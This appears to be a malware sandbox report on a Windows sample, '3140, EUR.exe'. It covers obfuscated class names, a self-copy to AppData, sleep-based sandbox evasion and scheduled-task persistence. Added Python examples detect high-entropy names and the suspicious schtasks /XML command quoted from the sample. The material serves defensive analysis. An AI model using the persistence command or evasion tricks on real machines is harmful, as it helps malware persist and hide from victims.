Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, onTDHLANSwQB4GuLwN.cs High entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, IYkmttbvFwlONMhZ0Rx.cs High entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, BNDjbyKEiDpGcvSWK6.cs High entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, kBEQvpZQ0mEMjME0yK.cs High entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, cxJt6jqq06XAko1daI.cs High entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, a5HLPykg5ohEWJsiPN.cs High entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, r35OtXmVa9mbccyjMN.cs High entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, IaNmoTU1Jas5HiM3Qc.cs High entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, pnbAqGRE0nfnZVOLAq.cs High entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, DgRGmDbjU6lUJhfE0v8.cs High entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs High entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, clSYfYveg2noAM7P8e.cs High entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, k9RBG6DgUfX4TknVHW.cs High entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, DZt0vvzJwZJilcpPKx.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, okXpofgYeVULwIjxF3.cs High entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, MU4Oupc1dL6Nvwl4EF.cs High entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, jHN6pNdJjWN1aRaPiD.cs High entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, jDZx6yMTIJBBgdc5M9.cs High entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, c43BOPb17cTkFlcAFvH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, JaiguuulGFOV4gjVP9.cs High entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, onTDHLANSwQB4GuLwN.cs High entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, IYkmttbvFwlONMhZ0Rx.cs High entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, BNDjbyKEiDpGcvSWK6.cs High entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, kBEQvpZQ0mEMjME0yK.cs High entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, cxJt6jqq06XAko1daI.cs High entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, a5HLPykg5ohEWJsiPN.cs High entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
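The entries above all come from one heuristic: concatenate a class's method names and measure the Shannon entropy of the result; randomly generated identifiers produce a flatter symbol distribution than readable names do. The following is an added example that re-implements that measurement in Python; it is not the sandbox's code. The method-name lists for the first two classes are copied from the dump entries above, the "OrderService" class and its names are constructed for comparison, and the 4.6 bits/char cut-off is an assumption for illustration, not the sandbox's published threshold.

```python
from __future__ import annotations

from collections import Counter
from math import log2

# Cut-off is an assumption for this example; the report does not state the sandbox's value.
ENTROPY_THRESHOLD = 4.6

# Method names for two classes copied from the dump entries above
# (0.2.3140, EUR.exe.9fd0000.5.raw.unpack), plus one constructed class with
# ordinary, readable names for comparison.
SAMPLE_CLASSES = {
    "onTDHLANSwQB4GuLwN": ["j85gV69F7r", "fQBgsJP8am", "DrogYioepT", "STxgk2JVed", "YZegEenEPY",
                           "gUlguBYDUy", "HM4gS3HYvN", "wcngqNglPH", "rHsgKM2jnY", "pdSgD7eY8H"],
    "BNDjbyKEiDpGcvSWK6": ["s4OaUwRsN5", "omxaJO2h34", "o1ja2jO0ZA", "VZwa7kFRkK", "g5OaVtx0EM",
                           "I82ax1xx4K", "Next", "Next", "Next", "NextBytes"],
    "OrderService (constructed)": ["ToString", "GetHashCode", "Equals", "Dispose",
                                   "Initialize", "Load", "Save"],
}


def shannon_entropy(text: str) -> float:
    """Bits per character of the empirical symbol distribution of text (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * log2(c / n) for c in Counter(text).values())


def method_name_entropy(names: list[str]) -> float:
    """Entropy of the concatenated method names, which is what the heuristic above measures."""
    return shannon_entropy("".join(names))


def flag_classes(classes: dict[str, list[str]],
                 threshold: float = ENTROPY_THRESHOLD) -> dict[str, tuple[float, bool]]:
    """Map each class to (entropy, flagged); flagged means the names look machine-generated."""
    result = {}
    for cls, names in classes.items():
        entropy = method_name_entropy(names)
        result[cls] = (round(entropy, 3), entropy >= threshold)
    return result


if __name__ == "__main__":
    for cls, (entropy, flagged) in flag_classes(SAMPLE_CLASSES).items():
        print(f"{cls:28s} {entropy:5.2f} bits/char  {'FLAG' if flagged else 'ok'}")
```

The second class shows why the cut-off matters: the four readable names (Next, Next, Next, NextBytes) are the signature of a System.Random subclass, and an obfuscator cannot rename overrides of framework virtual methods without breaking them, so they survive and pull the class's entropy down from the ~5.2 bits/char of the fully renamed class to ~4.8. Such surviving override names are also a useful hint about what an obfuscated class actually is.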
Source: C:\Users\user\Desktop\3140, EUR.exe File created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Boot Survival

barindex
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"
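The persistence mechanism above is schtasks.exe importing a task definition with /XML from a file in the user's Temp directory that carries a .tmp rather than .xml extension. Both properties are unusual for legitimate installers and are what a process-creation detection keys on. The following Python is an added example of that detection logic, not code from the report or the sandbox. It parses schtasks command lines of the kind found in Sysmon Event ID 1 or Security 4688 records; the first sample command line is the one from this report, the others are constructed, and the list of temp-directory markers is an assumption.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Staging locations a legitimate installer has no reason to use for a task definition (assumed list).
TEMP_DIR_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\temp\\")

# A schtasks argument value: either a quoted string (may contain spaces) or a single bare token.
_ARG = r'(?:"([^"]*)"|(\S+))'
_XML_RE = re.compile(r"/xml\s+" + _ARG, re.IGNORECASE)
_TN_RE = re.compile(r"/tn\s+" + _ARG, re.IGNORECASE)


@dataclass
class Finding:
    command_line: str
    task_name: str | None
    xml_path: str | None
    reasons: list[str] = field(default_factory=list)


def _argument(match: re.Match | None) -> str | None:
    """Unwrap whichever alternative of _ARG matched, or None when the switch is absent."""
    if match is None:
        return None
    return match.group(1) if match.group(1) is not None else match.group(2)


def analyze_schtasks(command_line: str) -> Finding | None:
    """Return a Finding for a /Create that imports a task definition from a suspicious file, else None."""
    lower = command_line.lower()
    if "schtasks" not in lower or "/create" not in lower:
        return None
    xml_path = _argument(_XML_RE.search(command_line))
    if xml_path is None:
        return None  # /TR-based creation is not what this rule looks for
    reasons = []
    xml_lower = xml_path.lower()
    if any(marker in xml_lower for marker in TEMP_DIR_MARKERS):
        reasons.append("task definition read from a temp directory")
    if not xml_lower.endswith(".xml"):
        reasons.append("task definition does not carry a .xml extension")
    if not reasons:
        return None
    return Finding(command_line, _argument(_TN_RE.search(command_line)), xml_path, reasons)


def scan(command_lines: list[str]) -> list[Finding]:
    """Run the rule over a batch of process-creation command lines."""
    return [f for f in map(analyze_schtasks, command_lines) if f is not None]


SAMPLE_COMMAND_LINES = [
    # From this report: the schtasks.exe invocation spawned by 3140, EUR.exe.
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"',
    # Constructed benign: an installer registering a task from its own install directory.
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Vendor\Updater" /XML "C:\Program Files\Vendor\updater-task.xml"',
    # Constructed: /TR-based creation with no XML import, outside this rule's scope.
    r'schtasks.exe /Create /SC DAILY /TN "Nightly Backup" /TR "C:\Tools\backup.exe"',
    # Constructed: a query, not a creation.
    r'schtasks.exe /Query /TN "Vendor\Updater"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(f"task={finding.task_name!r} xml={finding.xml_path!r}")
        for reason in finding.reasons:
            print(f"  - {reason}")
```

When triaging a hit, pull the task XML before it is cleaned up, or recover it from the registered task (Security Event ID 4698 logs the full task content), since the XML holds the action, trigger and run-level the command line does not show; here the dropped copy C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe is the obvious candidate for the task's action.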

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical entries)
Reads of module manifests like these are consistent with PowerShell's module auto-loading enumerating the installed modules while it resolves a command; on their own they do not show that the sample uses BitLocker.
Source: C:\Users\user\Desktop\3140, EUR.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\3140, EUR.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX (57 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (158 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: AF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 2800000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 4800000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 7860000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 8860000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 8A20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 9A20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: A060000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: B060000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: C060000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 2DD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 3010000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: 2E50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: C30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 29F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 2860000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 7780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 8780000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 8930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 9930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 9C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: AC80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 30A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 3200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 5200000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599328
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599219
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599000
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598672
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598344
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598007
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597786
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597672
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597560
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597334
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597212
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597045
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596937
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596828
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596717
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596609
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596500
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596391
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596266
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596141
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596031
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595922
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595812
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595703
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595594
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595484
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595375
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595266
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595141
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595016
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594865
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594484
